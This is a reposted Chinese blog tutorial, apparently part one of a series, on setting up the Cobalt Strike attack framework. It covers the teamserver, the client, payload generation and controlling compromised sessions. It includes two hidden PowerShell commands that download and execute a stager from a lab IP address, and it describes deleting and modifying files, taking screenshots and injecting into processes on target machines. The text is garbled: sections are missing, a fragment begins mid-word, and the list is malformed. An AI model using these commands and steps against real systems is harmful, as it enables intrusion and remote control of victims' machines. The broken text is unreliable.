cobaltr strike入门使用教程-1

前言

Cobalt Strike分为服务端和客户端两个部分从而实现分布式操作,协同作战。工具有linux和windows版本。

1.创建服务端

找到解压目录进入

./teamserver [IP] [password]

1037789-20190618123441861-840639499.png

2.创建客户端

运行cobaltstrike,在host字段输入ip,user字段随便写,password,port是开启端口,默认50050。

​ ./cobaltstrike

1037789-20190618123500356-983204577.png

荷,并与监听器绑定。

  1. PowerShell生成:
  2. windows Excecutable

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:80/a'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:801/a'))"

Sessoin使用。

可以对目标机器上文件进行删除增加修改。右键需要操作的session,进行文件操作,截屏,进程注入等。

转载于:https://www.cnblogs.com/NBeveryday/p/cs_1.html

猜你喜欢

转载自blog.csdn.net/weixin_34132768/article/details/93314646